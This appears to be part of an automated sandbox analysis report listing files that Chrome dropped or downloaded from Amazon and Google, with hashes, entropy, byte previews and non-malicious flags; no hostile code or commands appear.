                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2510
                                                                                                                                                                          Entropy (8bit):7.767323131095047
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:6761D71A456A177258F46096BDD35A40
                                                                                                                                                                          SHA1:D7930075B15C701CB70025CF48C42699EE2CDF2D
                                                                                                                                                                          SHA-256:4311ACDA91AD4839C4EECD33F66FD4A68B671C792793319C50BD52603C80A4A1
                                                                                                                                                                          SHA-512:DBF3985E8780ED38A631C26C3EC1D156F3D8BEAC1C1C1B0B3208D98358CCCEF7219E375CC7FD451BAA5D84DB9D13296790DAEFBC6E9F7FCA92932FAA82FF7A2B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!..1Aa..."Qq#2r..3....$4Rb..............................................1.A.............?............9..wv......7.......X......R.d..'.@.W..]..+..X..~.V..#..G..........Lc...b.3.]..a....e..S.}B3.._.6..S#.....V..?b }.............9....]..#.t.....}...I.R.q......6v..n..N. .....UT.g..]5x;..."L?...;<..L.......1.q.....J..s...1.4.}-..l.....;.?...;..<)?)..K.8.7...$`....y....DW......3.d...^..U.r).}.we........W.N|d..X.}......[.,>...i8..aT..J. .T.....bI3.E..X..]C...$.........L.....e.U....U....:Sr.\..N~=.6u....-...s....`z..m....[.O.N.@Q..?../..~... .-(^..j.k.X..m.k....&...<r.He?F.{6~...X+...-...K.=U.U..J%%.E..q.jxd....W...4y[[z.;..Z.].^."A." ""." "".Soi=}.Z.t.SeXu.,.t..E.(Mr..>^....[Z}.H.,.}WU._yk..}.=.HbO>........_..v..{cO[...........8.[...w
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (523)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):9763
                                                                                                                                                                          Entropy (8bit):5.5576256209320105
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:6EED3151A81957F00C3AA5AD97F78CAB
                                                                                                                                                                          SHA1:6C0E9AD0ACB70ECB40B78B05CC7273D5FF882C97
                                                                                                                                                                          SHA-256:8A1CA9608771693D06B0109E1E442D495DA603F32182A6527F9F1026C84780E9
                                                                                                                                                                          SHA-512:92462B00575FE2B761D3159F7ACE5D5FF4C56B71228925B187FEF8E164D5F8C4354215AC2BEF26F0532AA162257AEF285C8EEB902F4EFF187FD9DA8FCCBBE98A
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:(function(c,m){function y(a){if(a)return a.replace(/^\s+|\s+$/g,"")}function x(a,g){if(!a)return{};var b="INFO"===g.logLevel;a.m&&a.m.message&&(a=a.m);var f=g.m||g.message||"";f=a.m&&a.m.message?f+a.m.message:a.m&&a.m.target&&a.m.target.tagName?f+("Error handler invoked by "+a.m.target.tagName+" tag"):a.m?f+a.m:a.message?f+a.message:f+"Unknown error";f={m:f,name:a.name,type:a.type,csm:N+" "+(a.fromOnError?"onerror":"ueLogError")};var h,l=0;f.logLevel=g.logLevel||A;g.adb&&(f.adb=g.adb);if(h=g.attribution)f.attribution=.""+h;if(!b){f.pageURL=g.pageURL||""+(window.location?window.location.href:"")||"missing";f.f=a.f||a.sourceURL||a.fileName||a.filename||a.m&&a.m.target&&a.m.target.src;f.l=a.l||a.line||a.lineno||a.lineNumber;f.c=a.c?""+a.c:a.c;f.s=[];f.t=c.ue.d();if((b=a.stack||(a.err?a.err.stack:""))&&b.split)for(f.csm+=" stack",h=b.split("\n");l<h.length&&f.s.length<F;)(b=h[l++])&&f.s.push(y(b));else{f.csm+=" callee";var m=z(a.args||arguments,"callee");for(h=l=0;m&&l<F;){var v=G;m.skipTr
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2644
                                                                                                                                                                          Entropy (8bit):7.824040836106018
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:FA9838103CDB7475DED9FAC1DFA6AB57
                                                                                                                                                                          SHA1:D98AA06F3E8A3DA9970925E2F07F42352CF72745
                                                                                                                                                                          SHA-256:DB333467380E18754E6DBE34992A9B14E269A605320BD2D8C8BDBA7D7E2FD9E1
                                                                                                                                                                          SHA-512:77EC9A7E9010FD3F6F5602CAE8332AD8AF605386BC7AA113D44EF5DDE03E9B7E6157B10B1967D494BD3C23C11EF758001E5E9E701BF64DA0A421C5C03B8DFC08
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!.1AQ..a...R....."2SUqt.......#3BTr..%&ds....................................................!1."A.Q...a.q............?...D@...DD....D@...DD....D@.2H.....\..5...:...2...8:........c.c..}7.3.Oo......[B..No..wX.H8...;.o.[.........>......0...Sy.?..s.X...c...<.......g....z.....7.3.P...cK.1.....yq.3.T.f#....U8.G.>3a..R..~..v....JO:..^k=....s}U!..............JO:..S!.l"g.8..W=..`........GX...0..Fd.....7.R....2.".......UW.E.g~....I4..8.I..I)6'G..UC......T...1Q...7.qZA.C..T....I...5.}.).ldX..m...}h.k[;......;C^.HYb..OM....."..R..m....)^A...S.U!.G.P..U#.R_*.t...H._#@.q..Oj...-.U...F....p..Q+."./......F..}.s.S...m.i."...p..V....R.....'...}..x.}uW.z.:.. %..4.~`on......UV...oG..T..{Y0@.t.{.W...y.....B!D ...;..%f.}j;Z..W.Ll.8x"..e.k.J..'..I..i..t..*..6
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):4681
                                                                                                                                                                          Entropy (8bit):7.885171768153057
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:CD29D431641B42E47CE6380F6B135D0F
                                                                                                                                                                          SHA1:02402ABEF8E943376B695BD3B3B42F6E8C117B5C
                                                                                                                                                                          SHA-256:45C733E7705942A92FF68022F25AD52725AC7EAEF446E458FDD67E7640025D71
                                                                                                                                                                          SHA-512:D588880E171D704E09B491792D1875C893D6FB37520F3ACCE08AD034D3B59E543FDE6FB55D008245552B12DE7604FC4AD91FAE7AF5126F31EA17F0DC341164A4
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-YzkzYTU3ZTEt-w186._SY116_CB412108494_.jpg
                                                                                                                                                                          Preview:......JFIF.....H.H.....C............................................""""""''''',,,,,,,,,,...C.......................................................................t...."........................................@.........................!.1.A.."2QaqR.....Br..#356bs....Cd..................................,........................!...1AQ.#a...."2bq............?...R...)@.R...*...[.'Cy...`.@...pj%%..w\7IE..U..._....q.]._'.....DU......._..t...B....o..E.....[.z..-..g.4....a..f.dwnGHR..=.\...a.w....}....83.\.?......C%*....W7.n......`1.q..~..S...tn..T.k.g.d&6..y.d.S.\%-..#..p\..+Q.R...)J.R...)J.R...)J.TGx:Gc....R.'..`...T....6..4.....(P..br@........z 9=........&.|.3L....z?............:...8'#..gh'Y....H.5..v..e..[].B.0^H..0..?:..m..Z..kL..9.H...+....Uv2.D...h....i....2.}~..j...$x^.T.;y4.a..XDJ.q..'.w...&.N....du.r.==C<.. ..,e60...rV<#&..[..u.zm.....B...~..E..v....O.3.*.y..5...R..H..H..A....f.^.I.j....?..>.....T*z.fRY:J..:..fS'*.$`......a....#.%....V.]k
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, progressive, precision 8, 400x39, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):17663
                                                                                                                                                                          Entropy (8bit):7.884051005635435
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:A86A7B399A9091FC71E78C931D6DB720
                                                                                                                                                                          SHA1:0AB4E3BA22C3492FB9210301BE6A500F502645E4
                                                                                                                                                                          SHA-256:237BA5708995A430A247E18B743E22E5E17E2B18409A3C24153FB80BC46EC3B0
                                                                                                                                                                          SHA-512:9EF00C792928A84B07B7897D3BBDB0B7D5CDE90E31A65B1873DEB5117888F3720986CDE5936139E2FEE0D4619B18CEE5C42B37395EBB322B181C76D30D5AFFAA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 350 x 450, 8-bit colormap, non-interlaced
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):14256
                                                                                                                                                                          Entropy (8bit):7.935047719221589
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:64224EC939AC0B3487645C4E109030D5
                                                                                                                                                                          SHA1:B5AC2A7BC2AF1C9226987439F34BA8D4A79FBF0B
                                                                                                                                                                          SHA-256:2818F0BCCC7DDAA8E893C4655473D82589146DCC6E7AA6F78CEB9B3D4440C809
                                                                                                                                                                          SHA-512:9E2F8F391CA83B4DBD4170F91B30268F81D7F570E042699BD73135EA60BF3AE5AAA343F5BAE91430879DCF305914646499A6EF24C2E3CA604460585C3CCA7E31
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:.PNG........IHDR...^..........QQ.....gAMA......a.....sRGB.........PLTEGpL...........................................................................................I..C..............................................................3..........................2...........-...............................................2........2..*...........3..2.....2...........1..2..........................2w.............2...w........v.......2.....-.....2............w....2.....2w........w....2..2..2.....3...$$$.....2...........2......w....2...w..222..2........2............w.......2.........333..........g.......8...........?R ...v..***...333v..v..............v..................f..e....222...................n....v.....222.f..e.......222.e.....g..d.........3......w.."/?.f....333.............r....~..1=L[..s.....mu.......Q[h...[eqdmx;GT\|......tRNS........@..........'`..<.F.Q......c.pD...+..0.#3wJ.........m.^[...7_..V.....N.....s....fA...../...{..|N....j..l..-Mv&i.9#..~..$...6i...e9...D.y0xy/...zG..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 136 x 104, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):5861
                                                                                                                                                                          Entropy (8bit):7.941819196061047
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:661F95800A801676A279D066C3C8114E
                                                                                                                                                                          SHA1:C495A9B59AFD9B35A08C12513D40B8C7E7771499
                                                                                                                                                                          SHA-256:849C8F9A22736A09D7C0C7981842D932777B5A0056CBA7DF41997C49D536225D
                                                                                                                                                                          SHA-512:A42EC4D0051537ED8B7BD27150E4FEA8F688C3B5FF6FAB2EF03B64492DE8033517AE019F72855102BE5F4405E537A5600F987331B2B2D30F81F37FEB251FFB03
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/S/sash/ydDD9hnRfziI$y7.png
                                                                                                                                                                          Preview:.PNG........IHDR.......h.....*.......gAMA......a....:iCCPPhotoshop ICC profile..H...wTT....wz..0.)C.. .7..Da..`(..34.!...ED..A."..."."...`... ..`.QQy3.Vt.....g}k...=g.}.......tX..4.....J....c........`.23.B=.H>.n.L..."..7w.+.7....t..I...........d..P....}F....1.(1.E..........";....c.X|..v.[.=".%....qQ...-.[".L..qE.V...af.."....+I."&..B.D....).+........Rn...|nb........2...T.@`..d.0.l.[zZ......?KF\[....f...F..f_..n.M.{.H..?....}..._z=..YQmv|.....c3.....4.. ).[..W....%I .31...6.rX.......7.......(..........S.|zf.....y..q._..0....sx..p.qy..v..\.7.G...S..a..8."Q.>.j.1......>.....s@....7.|8.......,...e.%...9.-$............H.*P.*@...#`.l.=p......0..V..H.i...A>...@...v.jP..@.h.'@.8.....:..n..`....`......a!2D.. UH.2..!...y@.P....A....B..&..*...:....:.]..B..=h...~....L...2............p"......p.\.......u.6<.?.g........!....D......C..J..iA..^.&2.L#.P...EG...Q..(.j5j...U.:.jG..n.FQ3.Oh2Z.m..C..#..lt....nC_B.F...`0..F.c...Da.1k0....V.y. f.3..b...X.l ...`..{...C.q.[..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):3600
                                                                                                                                                                          Entropy (8bit):7.890786194679337
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:730F9BF453F6D8D9E549D29D91504768
                                                                                                                                                                          SHA1:481BCCF46BFEF31227ACE73953960A2177B202CF
                                                                                                                                                                          SHA-256:0B7D12BF279A942F5D966963A04549BA48DB2FE3A3F59FDF68CFD9C3D594A2F1
                                                                                                                                                                          SHA-512:28CD7576E35324C1C37CEAE2EF42A1ED55D26A2366DC097A18C99C901B7CE15DDE7A9B5B628FFFC5608E99EE69C1A6D21B3FECFBBCDE8756BA936DEA9A9B2CBF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!.1Aaq"2Q....BTr.......4RUb....#$D...Cc....................................................!1..2AR.."BQ.CSqab...............?...QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.T...q.i.......Q:.^....5>.w....5=ST...1......QS*..ec...F...56..1.S..%.nR.zH...\..(=$.....J..m....m.... S...s........)N.........0KG...A#x!..<....5l....T....~...'_.`.)[.zD...M...PSB.....20.......c.....u..E..y.|..}u....i\M.^....'.L........D%.^7.lw..6...'.G.3h.\}.{..0Q...k........!..L./..d..f:E...|}.~.37..t.w...8...1..$k..x.(...H.B...e..L..;.nE)./.N.C..Z.u$>.o..k..i....^.of..3.;...@j....=^...5ti.z...M....1h..E\0d.....=...6~E/.J....B1..V..Z}Y..2....U...L....CK...'Rp..S*...9......0..[TW.+...Y..-...W(AJx....\..G......r.(.......*s...D.a....;.v..(,..`..K.&.&.t.|R.0.X........F)
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2126
                                                                                                                                                                          Entropy (8bit):7.727551160854069
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:39D4307D1E3F7E1011831A12EAF630CF
                                                                                                                                                                          SHA1:4C5D059985B30F4D92BE536FE827499D0B7C0455
                                                                                                                                                                          SHA-256:75CBE731B4F76EC56A97BF842AD9961D459408B7A820BC2B08C36C5C1DCFBD7A
                                                                                                                                                                          SHA-512:AFF0E1FB6804FECFBBE6BDFEDD8FB6823737445558A1ABA8E357610FEF017714278DCCAE93D77C6E9BA12322F3BA5C5CF212A7E03A5C3FC92D066486305C7AFF
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........z.....................................................!1Aa.."Q..2q.r........$BRb.....................................................?....................f...]+........f.+.................WEc...Y.bw].P7...w&1..x(....s.{.u.....N.D:7P7.:..nl>.(#..c..1..^.........^i.eL.&*,...6E(x.X..cO......$.....k..w...Zj.un...i.w....=f8....e....w...-.,>.%..{...s..I.I<I]..rWHyt..j....f...r.^...m:.8o0:....k. K%L..L.7.o}......q.b..T..(..""." *..... (...Y.nfIe..d,..:<.......g..JA=.rI..E.(|L....@p.bt........Ap.4>#p_..._..I.O.C..j..o..uj[<.5.G.4w:. k.q+X,x."^.]...........c..[.....wW{8y...U...#..A(3L$..?....5.3..G..i.1.<...Ylq.gQ.B..<..3N..|.......O..N........^.=0G.G.......jO.."".....v..!....Q.]#....^=.%.*`..Eh.$...Mv.X._.....R..f.....jwD?.1.{.&5....o.q{'.w...%..v.7k....N.vY.P..z;........kF.2Tq.W..O...
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2839
                                                                                                                                                                          Entropy (8bit):7.849399637126677
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:C386F6266689EBC0522EB7EB05C5AD9B
                                                                                                                                                                          SHA1:1C0A48DBB579837EE53D30CAA80D9954DD3B3368
                                                                                                                                                                          SHA-256:A112B7E6A366F9581FC4EF637B564EE8587E77C3E77FAF506E85CC34B22F8EA2
                                                                                                                                                                          SHA-512:C705624433D459165E608F0000BB8D6DCF35B004264971322099232C626E2E19D18B5E7D9C1570FFA7E2B9CAB63D1C3125A4B53FAC9D15D7BC15009647F67518
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1Q...Aaq.."#2U.....R.....4BCbr..35Etu.STcs................................................1..!.AQ..."a...#23Rqr..............?.....DJ....%Z..h< ..A.....1*.xF...LJ......S....h< ...A...." ...$@...^Y.m.7u.!..i.T.,j...B.s.1./..~k.A.%.Y...s....*l\b...sQ>9..u+r..t..x....%.}.fY...w..j...^....}.A.....2<z....q.I..n..9_.4...4}.J.......E.ZU......l.R4kl...@....N....n..v.h...uPS..o....J.%=:.i..=........b..J]..M.|L..7.Q......*.;g..:.I[.(.....B.J..Z.s.x..).m..L.On|"....}JO.Wo3-~....~...7....|...8.lZ...m...........:..A.$./mk....<....j..7J#..,\\....:7...MM:....R.O...54q..:f..M.......rF...,....4.~...|...|:./.e=.3n...%.M..\.....x...8....{...F..F.he.......3...}UD;6vg...............qSu$Ino.WUhc..n.\.5...j........Q......!..*.F\.Q.+...DJ..D@...
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (2287)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):222099
                                                                                                                                                                          Entropy (8bit):5.527801371579231
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:C98EE385AFBFC4F370A2AF8BA70787A7
                                                                                                                                                                          SHA1:0A606DCA20EA55294A5A021A56DF4DDEC95FB8E5
                                                                                                                                                                          SHA-256:BD4F85458F40E75C01B32935FE9C685532434FB2A6D1297892EA772210037734
                                                                                                                                                                          SHA-512:FFA1B3F8577CF3E6A0BF69A167B63CF1594CA0CEB9D08605DDAFD99D081C8BCBD0098FB563EA6D325C8E9BC5E2AF14BCA4E48F62725CF3AAE3C64A4E4C865772
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{.var Ae;Ae=0;_.Be=function(a){return Object.prototype.hasOwnProperty.call(a,_.Kb)&&a[_.Kb]||(a[_.Kb]=++Ae)};_.Ce=function(a){return _.Jb(a)&&a.nodeType==1};_.De=function(a,b){if("textContent"in a)a.textContent=b;else if(a.nodeType==3)a.data=String(b);else if(a.firstChild&&a.firstChild.nodeType==3){for(;a.lastChild!=a.firstChild;)a.removeChild(a.lastChild);a.firstChild.data=String(b)}else _.ye(a),a.appendChild(_.ze(a).createTextNode(String(b)))};var Ee;_.Fe=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));var d="aria-"+b;c===""||c==void 0?(Ee||(Ee={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=Ee,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};var Je;_.Ie=function(a,b,c,d,e,f){if(_.ec&&e)return _.Ge(a);if(e&&!d)re
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:PNG image data, 194 x 295, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):45977
                                                                                                                                                                          Entropy (8bit):7.985058314720174
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:A824C7A90E2C465DA4C4DB9FD9FC15E4
                                                                                                                                                                          SHA1:36F46FBD4D03D1E55BC0B0D4381D351620750532
                                                                                                                                                                          SHA-256:6641FF165206F0F54CD94518DED93DFCBFC7436A806B0DE96991CB3DA4032A8B
                                                                                                                                                                          SHA-512:AF530AF8E111A8B7DA4C2776253E6BDFD295E2A84A11EBCC020024E6B8364C6D75AC2C8BAE725D6441036BB3F163E74410F87F9C9B031417F16DA330C5C708DC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/S/sash/Z8YwjOjqIHxqujG.png
                                                                                                                                                                          Preview:.PNG........IHDR.......'.............gAMA......a....KiCCPsRGB IEC61966-2.1..H..SgTS..=...BK...KoR.. RB..Ti........@...."....q....."..A...y.(..(6T....}..7o....9g..}>.F`.D....dJ....<6..'w..T ...@.-.................m@..n....8..P.....$......B....2r.2..2...t...%..[.....j..;e.O..v.$....(S*.@..@&.......X......`.(..s....`....`....).d....`...S......GE...3.(...x.W\!.S...d..T.n!...\].x.87C.P........ee......3...FvD.....9;.:;.8.:|...........?........E..............e..../.....B.._......T.B.fg...k+..m.._......_.....................2..r<[&..q.?......wL..'..b.P.GK..i....$.I...H.........k.`.~..B[P..... ..%....w......1...w..0....h....................4P.6h.>....#..;x...P..8X.BH.L.C.,.UP.%...B..Z..F8.-p.........<.^...0.o`.A.2.DX.6b..".#.Ef!~H0...!.H."E..Rd5R..#U.^....9..E.!=.=...F~C>...@..j..\...B...h....G...h%Z..B.......>G.0....3.l0...B.x,..c.b......6.....b#.{..."....;!.0. $,",'..........B.a...$....nD>1..B.%..+.u.c...[.......!..\H..8R.i......D:C.!....d.6..A.%...r.y;...
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (4232), with no line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):4232
                                                                                                                                                                          Entropy (8bit):5.531069792601157
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:38B058C8BB71C0032C59803161622F9C
                                                                                                                                                                          SHA1:6619A73B4535E6DA72007B4993780D195E3A45E8
                                                                                                                                                                          SHA-256:64FBE5BB45B550BEDF4884E1C6505DFF9A72AF235C428FA1BD13427E8E2F26C8
                                                                                                                                                                          SHA-512:B26E62620EA1FB19D987EA83C2BEBD566A95EFAB593B627B8B8AA23E9C6A676554C0C5B7997A927AF86CEAA548D6F9B1E73FC051160B569590946202EF1C0952
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:"https://www.google.com/xjs/_/ss/k=xjs.hd.V_kxjztwoQ8.L.B1.O/am=AFEAAAAAAAAAAAwAAAAAAAAAAAAAAAAAAAAIAAAEAAAAAAAAQAGwkwAAAQBsAEAAAAAABAAIAAAAAABAAQAAAQSwAAAAAAAQAAAREAEAAgQAAAAAhIAAAAQgQAgQQAICQBCFAAAAAAMAACEADDAMQKgAYBQgAAAAAICACAAAAABqBCBAAIAegQAwAAQRAABCQAcgAAACAASAAAAMBDBABhAAAAAAAAAAGQAAAAAAAAAAAAAAAAAAAAAAAAAAQAAQAFAAAAAAAAAAAAAAAAAAAAAAAQ/d=1/ed=1/br=1/rs=ACT90oEa5ADH0CT4QalUDMc_Rr04D2knww/m=cdos,hsm,jsa,mb4ZUb,d,csi,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl"
                                                                                                                                                                          Preview::root{--COEmY:#1f1f1f;--xhUGwc:#fff}:root{--vZe0jb:#a8c7fa;--nwXobb:#638ed4;--VuZXBd:#001d35;--uLz37c:#545d7e;--jINu6c:#001d35;--TyVYld:#0b57d0;--ZEpPmd:#c3d9fb;--QWaaaf:#638ed4;--DEeStf:#f5f8ff;--TSWZIb:#e5edff;--BRLwE:#d3e3fd;--gS5jXb:#dadce0;--Aqn7xd:#d2d2d2;--EpFNW:#fff;--IXoxUe:#5e5e5e;--bbQxAb:#474747;--YLNNHc:#1f1f1f;--TMYS9:#0b57d0;--JKqx2:#1a0dab;--rrJJUc:#0b57d0;--mXZkqc:#d2d2d2;--Nsm0ce:#0b57d0;--XKMDxc:#f3f5f6;--aYn2S:#f3f5f6;--Lm570b:#dee1e3}.zJUuqf{margin-bottom:4px}.AB4Wff{margin-left:16px}.OhScic{margin:0px}.v0rrvd{padding-bottom:16px}.zsYMMe{padding:0px}.VDgVie{text-align:center}.QyJI3d{background-color:var(--xhUGwc);color:#666;box-shadow:0 4px 16px rgba(0,0,0,0.2)}.oQcPt{background-color:var(--xhUGwc)}.QyJI3d{border:1px solid rgba(0,0,0,.2);position:absolute;z-index:9120}.nFdFHf{animation:g-bubble-show .2s forwards}.bE3Kif{animation:g-bubble-hide .2s forwards}@keyframes g-bubble-show{from{opacity:0}to{opacity:1}}@keyframes g-bubble-hide{from{opacity:1}to{opacity:0}}.Q
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4654
                                                                                                                                                                          Entropy (8bit):7.850529475485635
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:91BF5D7AE2555667FFFCA3B2625F74D1
                                                                                                                                                                          SHA1:FF4D94274E4D0508B63B8F3AAB2231951A9DE5E1
                                                                                                                                                                          SHA-256:0142872ADA74CF1C8414C1339D333A7EB91550D6F1B3184B96FC65444A46E34E
                                                                                                                                                                          SHA-512:1CD4BF9CA5AC8A85890BB830145E9306C9159A07F7B032CC8C22C0526D97B4033EE4518A86988A0313D12E1B56E00A7727A20F649FA36A92A933243B011B11E0
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................t...."..........3............................................................................|........7.7....v..k...3...a.......E..z=f.6B.l....+.M..J|..H*%...............*.=:'.?z...\-."8..R..2.C3g...h...3.m...3.....r...w.O.Z..K......S.......v.#...X-..z.....r.....oJ.....M.{.}.y........tC..2...Y9.3@.....h..m...M... ..MY.....j..~..[6..F.Rx.<fN..d....].....G...%.....>.....=8.x.O|..H...<.=.q..v(..<.^........5.............................!0..."1267. 5A.#'BPSTq............2....NF...^._.~t...eL...A]%D.5.]Mh%..HD4.<.b.*..~..q3.,mbe6..D;.H...[...X.@u.....#5o.......1k...H.h.D..6..<1....L..(.+I*&!...ep...,.r..o...>....n.CB&.F..&3%?.N..sD....L$...".D')..qB.4mk...D..D.w.,?..;.wc.I..U(u...#0....B..b.....H......%.o..^a.P...2............q..1.......e9...Y.k....|.H..o..DW{.q.Tb?j.....I.)....;.Y......-..
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
